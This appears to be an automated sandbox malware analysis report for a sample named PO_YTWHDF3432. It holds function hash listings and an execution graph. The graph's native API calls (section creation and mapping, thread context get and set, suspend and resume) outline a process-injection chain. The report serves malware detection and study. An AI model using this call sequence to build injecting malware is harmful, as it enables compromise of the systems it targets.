                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4a3b967c5c9283997b53d2c71f674de7ccc305e3ee300e8759e1b08effb604c7
                                                                          • Instruction ID: d09cfee3d3cd7489f4edafb4121ef7d45f4b695f7851a8f076fae302d6f343c6
                                                                          • Opcode Fuzzy Hash: 4a3b967c5c9283997b53d2c71f674de7ccc305e3ee300e8759e1b08effb604c7
                                                                          • Instruction Fuzzy Hash: 10C04C3658061C7ADA417A81DD02E957B1A9B34B50F408011BA081D5D185B251A4A661
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 08A5EABC Relevance: .0, Instructions: 8COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 166121d22a8f9ca8f1e36804d77e13c630d4db69fa69e6e59644dc58b0c99443
                                                                          • Instruction ID: aec9633aaea3389daa716274f6d1498c9e9f3ec3d0fde17d36f5fd9e7b4051d3
                                                                          • Opcode Fuzzy Hash: 166121d22a8f9ca8f1e36804d77e13c630d4db69fa69e6e59644dc58b0c99443
                                                                          • Instruction Fuzzy Hash: CBC0483969020ACBCF458EA0E84A8E87FB1EF05232B040016E80246660CA2A58E69A60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 08A58BA4 Relevance: .0, Instructions: 8COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2a062a2ed1af09d3d06c0817cc08e373efce158e2ebdfb6c3671a0913cf1f22f
                                                                          • Instruction ID: 2c4a068b6b72ec0cb9914ef3ef6d0e8fe9cedad6031baf2c8442715729785a4a
                                                                          • Opcode Fuzzy Hash: 2a062a2ed1af09d3d06c0817cc08e373efce158e2ebdfb6c3671a0913cf1f22f
                                                                          • Instruction Fuzzy Hash: 20B012BD37F60DA75000B66049A0F2FE025EFA2B02B81CC25F60D00910C4F054E4D22F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 08A5EC3D Relevance: .0, Instructions: 5COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d60e60ab9e55c5fbefa8ed13a14b6b04e40f8d2f606085cb5b5b04fd608238b7
                                                                          • Instruction ID: c459270e5c637a157bb89aa7a186cb8ec4878e3609f0fde8070bdbd90a38e2cb
                                                                          • Opcode Fuzzy Hash: d60e60ab9e55c5fbefa8ed13a14b6b04e40f8d2f606085cb5b5b04fd608238b7
                                                                          • Instruction Fuzzy Hash: A4B09230100214CFC708CB24D1989183B72AF44202B000058E4024A250CB32D881CE40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 08A5386D Relevance: .0, Instructions: 4COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e3504d00b3f85b3484b59a81d05b81dca779921e833402675cd5e564a48dd439
                                                                          • Instruction ID: d4864d5661521614e0407c8d292a3fa3c0e2be1c5a815c0e48eb8385ffc43d4c
                                                                          • Opcode Fuzzy Hash: e3504d00b3f85b3484b59a81d05b81dca779921e833402675cd5e564a48dd439
                                                                          • Instruction Fuzzy Hash: 87A0027293400487C658A656610E659BF30AA756437024481E542445505B2005499673
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 08A5DB50 Relevance: .0, Instructions: 2COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5d99f9f21c59d288ded5e6139e2fc202d52449e79e694fa38dbe23da5a5eec6f
                                                                          • Instruction ID: bb3c7d96aea384465608fab76e0cabe9ed78b5b5923d957130c416db863e0fdb
                                                                          • Opcode Fuzzy Hash: 5d99f9f21c59d288ded5e6139e2fc202d52449e79e694fa38dbe23da5a5eec6f
                                                                          • Instruction Fuzzy Hash:
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 08A55C40 Relevance: .3, Instructions: 347COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d2d23ae36f52755d177617f658416108e6bd088b4ea7f638e4ea32c04238c2fa
                                                                          • Instruction ID: 6841301a5b252f66099c34fc2576559defc3f60709d9df8b09a258948e881c83
                                                                          • Opcode Fuzzy Hash: d2d23ae36f52755d177617f658416108e6bd088b4ea7f638e4ea32c04238c2fa
                                                                          • Instruction Fuzzy Hash: BEC10132D08754CFC700CFADD8853AABBF1AF46621F54816BE856CFA92C27894C5C722
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 08A59978 Relevance: .3, Instructions: 272COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b800f041e89ba001e716791b7f9cfab01167adad00520001b88dcb4e611761dc
                                                                          • Instruction ID: 6cfa9e44b1b3ca69d31fb91108314128c3a5b75d79219f3434ca94db6122f698
                                                                          • Opcode Fuzzy Hash: b800f041e89ba001e716791b7f9cfab01167adad00520001b88dcb4e611761dc
                                                                          • Instruction Fuzzy Hash: 13D1093192475A8ACB10EF68D9906ADB771FF96300F50CB9AE4493B251EF706AC4CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 08A59990 Relevance: .3, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1265124678.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_8a50000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0a4a186c0e5f63cd25f97bf630992ca7703b80f6e72b02ed9a01e07d58729957
                                                                          • Instruction ID: 3c384dbde987b59574b11f9a08944870b91c62884c5556fec662b047c637f165
                                                                          • Opcode Fuzzy Hash: 0a4a186c0e5f63cd25f97bf630992ca7703b80f6e72b02ed9a01e07d58729957
                                                                          • Instruction Fuzzy Hash: C7D1F93192475A8ACB10EF68D9906ADB771FF96300F50CB9AE40A3B254EF706AC4CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04E7D9AC Relevance: .3, Instructions: 264COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1263026912.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4e70000_PO_YTWHDF3432.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 766cc0625a78f6d047e14c931c26e04ec53ee53bb53f614537ad01054f1853b1
                                                                          • Instruction ID: ab62ba300b661fa123b5ba99f209ee6c37f5e6333bd0577d4f3b4c7d64d69ab7
                                                                          • Opcode Fuzzy Hash: 766cc0625a78f6d047e14c931c26e04ec53ee53bb53f614537ad01054f1853b1
                                                                          • Instruction Fuzzy Hash: 4FA1AF32E00209CFCF05DFB5C84499EB7B2FF84315B1595AAE806BB265EB71E946CB40
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:1.4%
                                                                          Dynamic/Decrypted Code Coverage:1.8%
                                                                          Signature Coverage:11.1%
                                                                          Total number of Nodes:397
                                                                          Total number of Limit Nodes:35
                                                                          execution_graph 91098 42b363 91099 42b373 91098->91099 91100 42b379 91098->91100 91103 42a363 91100->91103 91102 42b39f 91106 428713 91103->91106 91105 42a37e 91105->91102 91107 42872d 91106->91107 91110 429463 91107->91110 91109 42873e RtlAllocateHeap 91109->91105 91111 429472 91110->91111 91113 4294d8 91110->91113 91111->91113 91114 423e53 91111->91114 91113->91109 91115 423e61 91114->91115 91117 423e6d 91114->91117 91115->91117 91119 4242d3 LdrLoadDll 91115->91119 91117->91113 91118 423fbf 91118->91113 91119->91118 91120 4239c3 91121 4239df 91120->91121 91132 428143 91121->91132 91124 423a07 91126 428453 2 API calls 91124->91126 91125 423a1b 91136 428453 91125->91136 91128 423a10 91126->91128 91129 423a24 91140 42a3a3 LdrLoadDll RtlAllocateHeap 91129->91140 91131 423a2f 91133 428160 91132->91133 91134 429463 LdrLoadDll 91133->91134 91135 423a00 91134->91135 91135->91124 91135->91125 91137 428470 91136->91137 91138 429463 LdrLoadDll 91137->91138 91139 428481 NtClose 91138->91139 91139->91129 91140->91131 91141 4281e3 91142 42825d 91141->91142 91143 428207 91141->91143 91145 429463 LdrLoadDll 91142->91145 91144 429463 LdrLoadDll 91143->91144 91146 428221 91144->91146 91147 428273 91145->91147 91150 40ab73 91146->91150 91149 428256 91153 40ab95 91150->91153 91151 40acb2 NtCreateFile 91152 40acf1 91151->91152 91152->91149 91153->91151 91453 423d53 91456 423d62 91453->91456 91454 423da6 91455 42a283 2 API calls 91454->91455 91457 423db6 91455->91457 91456->91454 91458 423de4 91456->91458 91460 423de9 91456->91460 91459 42a283 2 API calls 91458->91459 91459->91460 91461 428313 91462 428337 91461->91462 91463 428385 91461->91463 91464 429463 LdrLoadDll 91462->91464 91465 429463 LdrLoadDll 91463->91465 91466 428351 91464->91466 91467 42839b 91465->91467 91470 40ada3 91466->91470 91469 42837e 91473 40adc5 91470->91473 91471 40aee2 NtReadFile 91472 40af19 91471->91472 91472->91469 91473->91471 91474 41d653 91475 41d679 91474->91475 91476 423e53 LdrLoadDll 91475->91476 91478 41d6cd 91476->91478 91477 41da46 91478->91477 91521 4287f3 LdrLoadDll 91478->91521 91480 41d71e 91481 41da2e 91480->91481 91522 42b493 91480->91522 91482 42a283 2 API calls 91481->91482 91482->91477 91484 41d73d 91484->91481 91485 41d846 91484->91485 91486 427bb3 2 API calls 91484->91486 91528 418713 LdrLoadDll LdrInitializeThunk 91485->91528 91487 41d7c4 91486->91487 91487->91485 91492 41d7cc 91487->91492 91489 41d871 91489->91481 91494 41d8a6 91489->91494 91531 418603 NtMapViewOfSection LdrLoadDll 91489->91531 91490 41d82c 91491 42a283 2 API calls 91490->91491 91495 41d83c 91491->91495 91492->91477 91492->91490 91493 41d7fb 91492->91493 91529 418603 NtMapViewOfSection LdrLoadDll 91492->91529 91498 428453 2 API calls 91493->91498 91501 41d8d6 91494->91501 91502 41da0d 91494->91502 91499 41d80b 91498->91499 91530 4259a3 NtDelayExecution LdrLoadDll 91499->91530 91532 4284f3 LdrLoadDll 91501->91532 91505 42a283 2 API calls 91502->91505 91504 41d8f5 91507 41a4a3 3 API calls 91504->91507 91506 41da24 91505->91506 91508 41d95e 91507->91508 91508->91481 91509 41d969 91508->91509 91510 42a283 2 API calls 91509->91510 91511 41d98d 91510->91511 91533 427e13 LdrLoadDll 91511->91533 91513 41d9a1 91514 427d53 2 API calls 91513->91514 91515 41d9c8 91514->91515 91516 41d9cf 91515->91516 91534 427e13 LdrLoadDll 91515->91534 91518 41d9f5 91519 4279c3 2 API calls 91518->91519 91520 41da03 91519->91520 91521->91480 91523 42b403 91522->91523 91524 42a363 2 API calls 91523->91524 91525 42b460 91523->91525 91526 42b43d 91524->91526 91525->91484 91527 42a283 2 API calls 91526->91527 91527->91525 91528->91489 91529->91493 91530->91490 91531->91494 91532->91504 91533->91513 91534->91518 91535 41a5f3 91543 4277b3 91535->91543 91537 41a637 91542 41a658 91537->91542 91550 427943 91537->91550 91539 41a648 91540 41a664 91539->91540 91541 428453 2 API calls 91539->91541 91541->91542 91544 4277d4 91543->91544 91545 42780e 91543->91545 91547 429463 LdrLoadDll 91544->91547 91546 429463 LdrLoadDll 91545->91546 91548 427824 91546->91548 91549 4277ee 91547->91549 91548->91537 91549->91537 91551 427967 91550->91551 91552 427999 91550->91552 91554 429463 LdrLoadDll 91551->91554 91553 429463 LdrLoadDll 91552->91553 91558 4279af 91553->91558 91555 427981 91554->91555 91559 409d23 91555->91559 91557 427992 91557->91539 91558->91539 91560 409d45 91559->91560 91561 409e62 NtSuspendThread 91560->91561 91562 409e7d 91561->91562 91562->91557 91563 413bf3 91564 413c0d 91563->91564 91571 4173f3 91564->91571 91566 413c2b 91567 423e53 LdrLoadDll 91566->91567 91568 413c41 91567->91568 91569 413c70 91568->91569 91570 413c5f PostThreadMessageW 91568->91570 91570->91569 91572 417417 91571->91572 91573 417453 LdrLoadDll 91572->91573 91574 41741e 91572->91574 91573->91574 91574->91566 91575 1922b60 LdrInitializeThunk 91576 4185d8 91577 428453 2 API calls 91576->91577 91578 4185e2 91577->91578 91154 401b2f 91155 401b44 91154->91155 91158 42b803 91155->91158 91161 429e73 91158->91161 91162 429e99 91161->91162 91173 416323 91162->91173 91164 429eaf 91172 401b99 91164->91172 91176 41a413 91164->91176 91166 429ece 91167 429ee3 91166->91167 91192 4287b3 91166->91192 91188 426253 91167->91188 91170 429ef2 91171 4287b3 2 API calls 91170->91171 91171->91172 91175 416330 91173->91175 91196 416273 91173->91196 91175->91164 91177 41a43f 91176->91177 91234 417783 91177->91234 91179 41a451 91238 41a303 91179->91238 91182 41a484 91185 41a495 91182->91185 91187 428453 2 API calls 91182->91187 91183 41a46c 91184 41a477 91183->91184 91186 428453 2 API calls 91183->91186 91184->91166 91185->91166 91186->91184 91187->91185 91189 4262ad 91188->91189 91191 4262ba 91189->91191 91266 417f23 91189->91266 91191->91170 91193 4287cd 91192->91193 91194 429463 LdrLoadDll 91193->91194 91195 4287de ExitProcess 91194->91195 91195->91167 91197 41628a 91196->91197 91213 425313 LdrLoadDll 91196->91213 91203 425373 91197->91203 91200 416296 91202 4162a3 91200->91202 91206 428df3 91200->91206 91202->91175 91214 4286d3 91203->91214 91208 428e0b 91206->91208 91207 428e2f 91207->91202 91208->91207 91218 427bb3 91208->91218 91213->91197 91215 4286ed 91214->91215 91216 429463 LdrLoadDll 91215->91216 91217 425390 91216->91217 91217->91200 91219 427bd0 91218->91219 91220 429463 LdrLoadDll 91219->91220 91221 427be1 91220->91221 91227 1922c0a 91221->91227 91222 427bfc 91224 42a283 91222->91224 91230 428763 91224->91230 91226 428e9a 91226->91202 91228 1922c11 91227->91228 91229 1922c1f LdrInitializeThunk 91227->91229 91228->91222 91229->91222 91231 428780 91230->91231 91232 429463 LdrLoadDll 91231->91232 91233 428791 RtlFreeHeap 91232->91233 91233->91226 91235 4177c9 91234->91235 91248 417613 LdrLoadDll 91235->91248 91237 41785c 91237->91179 91239 41a31d 91238->91239 91247 41a3f9 91238->91247 91249 4176d3 91239->91249 91241 41a362 91254 427c03 91241->91254 91243 41a3a7 91258 427c53 91243->91258 91246 428453 2 API calls 91246->91247 91247->91182 91247->91183 91248->91237 91250 4176f8 91249->91250 91253 417703 91250->91253 91264 417613 LdrLoadDll 91250->91264 91252 41774b 91252->91241 91253->91241 91255 427c20 91254->91255 91256 429463 LdrLoadDll 91255->91256 91257 427c31 91256->91257 91257->91243 91259 427c70 91258->91259 91260 429463 LdrLoadDll 91259->91260 91261 427c81 91260->91261 91265 19235c0 LdrInitializeThunk 91261->91265 91262 41a3ed 91262->91246 91264->91252 91265->91262 91269 417f4d 91266->91269 91267 4183bb 91267->91191 91269->91267 91292 423363 91269->91292 91270 417fec 91270->91267 91295 413d23 91270->91295 91272 41805a 91272->91267 91273 42a283 2 API calls 91272->91273 91277 418072 91273->91277 91274 4180a4 91280 4180ab 91274->91280 91312 41a4a3 91274->91312 91276 4180e4 91276->91267 91319 427d53 91276->91319 91277->91274 91308 406cc3 91277->91308 91280->91267 91328 427843 91280->91328 91282 418141 91337 4278c3 91282->91337 91284 41834a 91288 41836d 91284->91288 91354 4279c3 91284->91354 91285 418161 91285->91284 91346 406d33 91285->91346 91290 41838a 91288->91290 91350 41a673 91288->91350 91291 4287b3 2 API calls 91290->91291 91291->91267 91363 42a1f3 91292->91363 91294 423384 91294->91270 91298 413d89 91295->91298 91302 413d42 91295->91302 91296 413e97 91296->91272 91297 413e60 91297->91296 91395 41a713 LdrLoadDll RtlFreeHeap LdrInitializeThunk 91297->91395 91298->91296 91298->91297 91379 4134c3 91298->91379 91301 413e74 91301->91296 91396 41a713 LdrLoadDll RtlFreeHeap LdrInitializeThunk 91301->91396 91302->91296 91302->91298 91303 41a673 2 API calls 91302->91303 91303->91302 91305 413e8d 91305->91272 91306 413dc6 91306->91297 91392 413783 91306->91392 91309 406cf3 91308->91309 91310 41a673 2 API calls 91309->91310 91311 406d14 91309->91311 91310->91309 91311->91274 91313 41a4c0 91312->91313 91411 427ca3 91313->91411 91315 41a510 91316 41a517 91315->91316 91317 427d53 2 API calls 91315->91317 91316->91276 91318 41a540 91317->91318 91318->91276 91320 427dc6 91319->91320 91321 427d74 91319->91321 91322 429463 LdrLoadDll 91320->91322 91323 429463 LdrLoadDll 91321->91323 91324 427ddc 91322->91324 91325 427d8e 91323->91325 91324->91280 91424 40a953 91325->91424 91327 427dbf 91327->91280 91329 427864 91328->91329 91330 427896 91328->91330 91331 429463 LdrLoadDll 91329->91331 91332 429463 LdrLoadDll 91330->91332 91333 42787e 91331->91333 91334 4278ac 91332->91334 91428 409f23 91333->91428 91334->91282 91336 42788f 91336->91282 91338 4278e7 91337->91338 91339 427919 91337->91339 91340 429463 LdrLoadDll 91338->91340 91341 429463 LdrLoadDll 91339->91341 91342 427901 91340->91342 91343 42792f 91341->91343 91432 40a123 91342->91432 91343->91285 91345 427912 91345->91285 91347 406d53 91346->91347 91348 41a673 2 API calls 91347->91348 91349 406d73 91347->91349 91348->91347 91349->91284 91351 41a686 91350->91351 91436 427ae3 91351->91436 91353 41a6b1 91353->91288 91355 427a19 91354->91355 91356 4279e7 91354->91356 91357 429463 LdrLoadDll 91355->91357 91358 429463 LdrLoadDll 91356->91358 91360 427a2f 91357->91360 91359 427a01 91358->91359 91449 40a323 91359->91449 91360->91288 91362 427a12 91362->91288 91366 428593 91363->91366 91365 42a224 91365->91294 91367 4285f6 91366->91367 91368 4285b4 91366->91368 91369 429463 LdrLoadDll 91367->91369 91370 429463 LdrLoadDll 91368->91370 91374 42860c 91369->91374 91371 4285ce 91370->91371 91375 40b623 91371->91375 91373 4285ef 91373->91365 91374->91365 91376 40b645 91375->91376 91377 40b762 NtAllocateVirtualMemory 91376->91377 91378 40b78d 91377->91378 91378->91373 91380 4134d3 91379->91380 91381 4134ce 91379->91381 91382 42a1f3 2 API calls 91380->91382 91381->91306 91388 4134f8 91382->91388 91383 41355f 91383->91306 91385 413565 91387 41358f 91385->91387 91389 428683 2 API calls 91385->91389 91387->91306 91388->91383 91388->91385 91390 42a1f3 2 API calls 91388->91390 91397 427b63 91388->91397 91403 428683 91388->91403 91391 413580 91389->91391 91390->91388 91391->91306 91393 428683 2 API calls 91392->91393 91394 4137a5 91393->91394 91394->91297 91395->91301 91396->91305 91398 427b80 91397->91398 91399 429463 LdrLoadDll 91398->91399 91400 427b91 91399->91400 91409 1922df0 LdrInitializeThunk 91400->91409 91401 427ba8 91401->91388 91404 42869d 91403->91404 91405 429463 LdrLoadDll 91404->91405 91406 4286ae 91405->91406 91410 1922c70 LdrInitializeThunk 91406->91410 91407 4286c5 91407->91388 91409->91401 91410->91407 91412 427cc4 91411->91412 91413 427d0a 91411->91413 91414 429463 LdrLoadDll 91412->91414 91415 429463 LdrLoadDll 91413->91415 91416 427cde 91414->91416 91417 427d20 91415->91417 91420 40a733 91416->91420 91417->91315 91419 427d03 91419->91315 91423 40a755 91420->91423 91421 40a872 NtCreateSection 91422 40a8a1 91421->91422 91422->91419 91423->91421 91427 40a975 91424->91427 91425 40aa92 NtMapViewOfSection 91426 40aacd 91425->91426 91426->91327 91427->91425 91431 409f45 91428->91431 91429 40a062 NtGetContextThread 91430 40a07d 91429->91430 91430->91336 91431->91429 91435 40a145 91432->91435 91433 40a262 NtSetContextThread 91434 40a27d 91433->91434 91434->91345 91435->91433 91437 427b07 91436->91437 91438 427b39 91436->91438 91439 429463 LdrLoadDll 91437->91439 91440 429463 LdrLoadDll 91438->91440 91441 427b21 91439->91441 91442 427b4f 91440->91442 91445 40b213 91441->91445 91442->91353 91444 427b32 91444->91353 91448 40b235 91445->91448 91446 40b352 NtDelayExecution 91447 40b36e 91446->91447 91447->91444 91448->91446 91451 40a345 91449->91451 91450 40a462 NtResumeThread 91452 40a47d 91450->91452 91451->91450 91452->91362

                                                                          Executed Functions

                                                                          Function 0040A323 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170nativethreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • NtResumeThread.NTDLL(%o@,?,?,?,?), ref: 0040A46A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID: %o@$%o@
                                                                          • API String ID: 947044025-618112537
                                                                          • Opcode ID: 9a8e4d286178fea2a4a6c4b3173bc6d9a17118359cd30a0f8428712cc09e4e8b
                                                                          • Instruction ID: a180d3cde8570c79af263549b5a123663d1f596594efc184d6facc428f3df757
                                                                          • Opcode Fuzzy Hash: 9a8e4d286178fea2a4a6c4b3173bc6d9a17118359cd30a0f8428712cc09e4e8b
                                                                          • Instruction Fuzzy Hash: EA715D75E04258DFCB04CFA9D484AEDBBF1BF49304F1880AAE459B7341D238A952DF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040A733 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 180nativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 100 40a733-40a74f 101 40a755-40a794 call 4097d3 100->101 102 40a750 call 4097c3 100->102 105 40a872-40a89b NtCreateSection 101->105 106 40a79a-40a7df call 409863 call 42b882 call 409733 call 42b882 101->106 102->101 107 40a8a1-40a8a8 105->107 108 40a938-40a944 105->108 128 40a7ea-40a7f0 106->128 110 40a8b3-40a8b9 107->110 112 40a8e1-40a8e5 110->112 113 40a8bb-40a8df 110->113 117 40a927-40a935 call 409863 112->117 118 40a8e7-40a8ee 112->118 113->110 117->108 120 40a8f9-40a8ff 118->120 120->117 123 40a901-40a925 120->123 123->120 129 40a7f2-40a816 128->129 130 40a818-40a81c 128->130 129->128 130->105 131 40a81e-40a839 130->131 133 40a844-40a84a 131->133 133->105 134 40a84c-40a870 133->134 134->133
                                                                          APIs
                                                                          • NtCreateSection.NTDLL(?,00000000,000F001F,?,?,An@,00000000,?,?,08000000), ref: 0040A88E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateSection
                                                                          • String ID: An@
                                                                          • API String ID: 2449625523-62601564
                                                                          • Opcode ID: 3131d5dc1d820d0612834a904be202933f8669efa2cfcc61d350db917952ab80
                                                                          • Instruction ID: 41a694da47314c6f7953bebff27000536f1853d4fe1618860b860f471416e69f
                                                                          • Opcode Fuzzy Hash: 3131d5dc1d820d0612834a904be202933f8669efa2cfcc61d350db917952ab80
                                                                          • Instruction Fuzzy Hash: 36713BB1E04258DFCB04DFA9C490AEDBBF5BF49304F18816AE859B7341D238AA52CF55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040AB73 Relevance: 1.7, APIs: 1, Instructions: 188filenativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 145 40ab73-40abd4 call 4097c3 call 4097d3 150 40acb2-40aceb NtCreateFile 145->150 151 40abda-40ac1f call 409863 call 42b882 call 409733 call 42b882 145->151 153 40acf1-40acf8 150->153 154 40ad88-40ad94 150->154 173 40ac2a-40ac30 151->173 156 40ad03-40ad09 153->156 158 40ad31-40ad35 156->158 159 40ad0b-40ad2f 156->159 162 40ad77-40ad85 call 409863 158->162 163 40ad37-40ad3e 158->163 159->156 162->154 165 40ad49-40ad4f 163->165 165->162 168 40ad51-40ad75 165->168 168->165 174 40ac32-40ac56 173->174 175 40ac58-40ac5c 173->175 174->173 175->150 177 40ac5e-40ac79 175->177 178 40ac84-40ac8a 177->178 178->150 179 40ac8c-40acb0 178->179 179->178
                                                                          APIs
                                                                          • NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040ACDE
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.1370308001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_PO_YTWHDF3432.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 8ab9d362cc5fb06384091f6af35ac9f3ea333ab5dfcc3f011468464862423996
                                                                          • Instruction ID: 1c07fbbcbdb6f1aea2f7691a6cf0475e8e686830d361e3a4b3f409b1fbea8beb
                                                                          • Opcode Fuzzy Hash: 8ab9d362cc5fb06384091f6af35ac9f3ea333ab5dfcc3f011468464862423996
                                                                          • Instruction Fuzzy Hash: BB814DB1E14258DFCB04CFA9C490AEDBBF5AF4D304F18816AE859B7341D238A952CB95
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040A953 Relevance: 1.7, APIs: 1, Instructions: 186nativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 181 40a953-40a9b4 call 4097c3 call 4097d3 186 40aa92-40aac7 NtMapViewOfSection 181->186 187 40a9ba-40a9ff call 409863 call 42b882 call 409733 call 42b882 181->187 189 40ab64-40ab70 186->189 190 40aacd-40aad4 186->190 209 40aa0a-40aa10 187->209 192 40aadf-40aae5 190->192 194 40aae7-40ab0b 192->194 195 40ab0d-40ab11 192->195 194->192 197 40ab53-40ab61 call 409863 195->197 198 40ab13-40ab1a 195->198 197->189 200 40ab25-40ab2b 198->200 200->197 204 40ab2d-40ab51 200->204 204->200 210 40aa12-40aa36 209->210 211 40aa38-40aa3c 209->211 210->209 211->186 213 40aa3e-40aa59 211->213 214 40aa64-40aa6a 213->214 214->186 215 40aa6c-40aa90 214->215 215->214
                                                                          APIs
                                                                          • NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,00406E84,?,?,?,00000000), ref: 0040AABA
